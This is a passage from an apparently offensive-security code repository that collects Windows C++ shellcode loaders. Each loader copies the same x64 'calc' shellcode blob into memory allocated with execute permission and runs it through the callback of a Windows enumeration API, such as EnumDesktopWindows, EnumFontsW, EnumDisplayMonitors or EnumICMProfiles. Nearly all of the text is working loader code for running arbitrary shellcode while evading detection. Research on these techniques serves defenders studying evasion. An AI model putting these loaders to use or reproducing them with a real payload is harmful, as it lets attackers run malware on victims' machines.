"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 30 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 31 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 32 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 33 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 34 | "\x63\x2e\x65\x78\x65\x00"; 35 | 36 | 37 | 38 | int main() { 39 | 40 | 41 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 42 | ::RtlMoveMemory(addr, op, sizeof(op)); 43 | 44 | ::EnumDesktopsW(GetProcessWindowStation(), (DESKTOPENUMPROCW)addr, NULL); 45 | 46 | Sleep(10000); 47 | printf("success"); 48 | 49 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumDesktopW/EnumDesktopW.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumDesktopWindows/EnumDesktopWindows.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | 5 | int err(const char* errmsg) { 6 | 7 | 8 | printf("Error: %s (%u)\n", errmsg, ::GetLastError()); 9 | return 1; 10 | 11 | } 12 | 13 | // alfarom256 calc shellcode 14 | unsigned char op[] = 15 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 16 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 17 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 18 | 
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 19 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 20 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 21 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 22 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 23 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 24 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 25 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 26 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 27 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 28 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 29 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 30 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 31 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 32 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 33 | "\x63\x2e\x65\x78\x65\x00"; 34 | 35 | 36 | 37 | int main() { 38 | 39 | 40 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 41 | ::RtlMoveMemory(addr, op, sizeof(op)); 42 | 43 | 44 | if (addr) 45 | ::EnumDesktopWindows(::GetThreadDesktop(::GetCurrentThreadId()), (WNDENUMPROC)addr, NULL); 46 | 47 | 48 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumDesktopWindows/EnumDesktopWindows.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 
21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumDirTreeW/EnumDirTreeW.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // requires Dbghelp.lib 5 | #include 6 | #pragma comment(lib, "Dbghelp.lib") 7 | 8 | // alfarom256 calc shellcode 9 | unsigned char op[] = 10 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 11 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 12 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 13 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 14 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 15 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 16 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 17 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 18 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 19 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 20 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 21 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 22 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 23 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 24 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 25 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 26 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 27 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 28 | "\x63\x2e\x65\x78\x65\x00"; 29 | 30 | int main() { 31 | 32 | 33 | LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 34 | memcpy(address, &op[0], sizeof(op)); 35 | 36 | ::SymInitialize(::GetCurrentProcess(), NULL, TRUE); 37 | 38 | WCHAR dummy[522]; 39 | ::EnumDirTreeW(::GetCurrentProcess(), L"C:\\Windows", L"*.log", 
dummy, (PENUMDIRTREE_CALLBACKW)address, NULL); 40 | 41 | 42 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumDirTreeW/EnumDirTreeW.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumDisplayMonitors/EnumDisplayMonitors.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | 5 | int err(const char* errmsg) { 6 | 7 | 8 | printf("Error: %s (%u)\n", errmsg, ::GetLastError()); 9 | return 1; 10 | 11 | } 12 | 13 | // alfarom256 calc shellcode 14 | unsigned char op[] = 15 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 16 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 17 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 18 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 19 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 20 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 21 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 22 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 23 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 24 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 25 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 26 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 27 | 
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 28 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 29 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 30 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 31 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 32 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 33 | "\x63\x2e\x65\x78\x65\x00"; 34 | 35 | 36 | 37 | int main() { 38 | 39 | 40 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 41 | ::RtlMoveMemory(addr, op, sizeof(op)); 42 | 43 | ::EnumDisplayMonitors(NULL, NULL, (MONITORENUMPROC)addr, NULL); 44 | 45 | 46 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumDisplayMonitors/EnumDisplayMonitors.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumFontFamiliesExW/EnumFontFamiliesExW.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // alfarom256 calc shellcode 5 | unsigned char op[] = 6 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 7 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 8 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 9 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 10 | 
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 11 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 12 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 13 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 14 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 15 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 16 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 17 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 18 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 19 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 20 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 21 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 22 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 23 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 24 | "\x63\x2e\x65\x78\x65\x00"; 25 | 26 | 27 | 28 | 29 | int main() { 30 | 31 | 32 | LPVOID address = VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 33 | memcpy(address, &op[0], sizeof(op)); 34 | 35 | 36 | LOGFONTW lf = { 0 }; 37 | lf.lfCharSet = DEFAULT_CHARSET; 38 | 39 | 40 | HDC dc = GetDC(NULL); 41 | EnumFontFamiliesExW(dc, &lf, (FONTENUMPROCW)address, NULL, NULL); 42 | 43 | return 0; 44 | 45 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumFontFamiliesExW/EnumFontFamiliesExW.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 
18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumFontFamiliesW/EnumFontFamiliesW.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // alfarom256 calc shellcode 5 | unsigned char op[] = 6 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 7 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 8 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 9 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 10 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 11 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 12 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 13 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 14 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 15 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 16 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 17 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 18 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 19 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 20 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 21 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 22 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 23 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 24 | "\x63\x2e\x65\x78\x65\x00"; 25 | 26 | 27 | 28 | 29 | int main() { 30 | 31 | 32 | LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 33 | memcpy(address, &op[0], sizeof(op)); 34 | 35 | 36 | HDC dc = GetDC(NULL); 37 | EnumFontFamiliesW(dc, NULL, (FONTENUMPROCW)address, NULL); 38 | 39 | return 0; 40 | 41 | } 
-------------------------------------------------------------------------------- /Shellcode Execution/EnumFontFamiliesW/EnumFontFamiliesW.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumFontsW/EnumFontsW.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | 4 | // alfarom256 calc shellcode 5 | unsigned char op[] = 6 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 7 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 8 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 9 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 10 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 11 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 12 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 13 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 14 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 15 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 16 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 17 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 18 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 19 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 20 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 21 | 
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 22 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 23 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 24 | "\x63\x2e\x65\x78\x65\x00"; 25 | 26 | 27 | 28 | 29 | int main() { 30 | 31 | 32 | LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 33 | memcpy(address, &op[0], sizeof(op)); 34 | 35 | 36 | HDC dc = GetDC(NULL); 37 | EnumFontsW(dc, NULL, (FONTENUMPROCW)address, NULL); 38 | 39 | return 0; 40 | 41 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumFontsW/EnumFontsW.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumICMProfiles/EnumICMProfiles.cpp: -------------------------------------------------------------------------------- 1 | // EnumICMProfiles.cpp : This file contains the 'main' function. Program execution begins and ends there. 
2 | // 3 | 4 | #include 5 | 6 | unsigned char op[] = 7 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 8 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 9 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 10 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 11 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 12 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 13 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 14 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 15 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 16 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 17 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 18 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 19 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 20 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 21 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 22 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 23 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 24 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 25 | "\x63\x2e\x65\x78\x65\x00"; 26 | 27 | 28 | 29 | int main() { 30 | 31 | 32 | LPVOID addr = VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 33 | ::RtlMoveMemory(addr, op, sizeof(op)); 34 | 35 | HDC dummy = GetDC(NULL); 36 | EnumICMProfilesW(dummy, (ICMENUMPROCW)addr, NULL); 37 | 38 | } 39 | 40 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumICMProfiles/EnumICMProfiles.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 
| h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumLanguageGroupLocalesW/EnumLanguageGroupLocalesW.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | 5 | // alfarom256 calc shellcode 6 | unsigned char op[] = 7 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 8 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 9 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 10 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 11 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 12 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 13 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 14 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 15 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 16 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 17 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 18 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 19 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 20 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 21 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 22 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 23 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 24 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 25 | "\x63\x2e\x65\x78\x65\x00"; 26 | 27 | 28 | 29 | 30 | int main() { 31 | 32 | 33 | LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 34 | memcpy(address, 
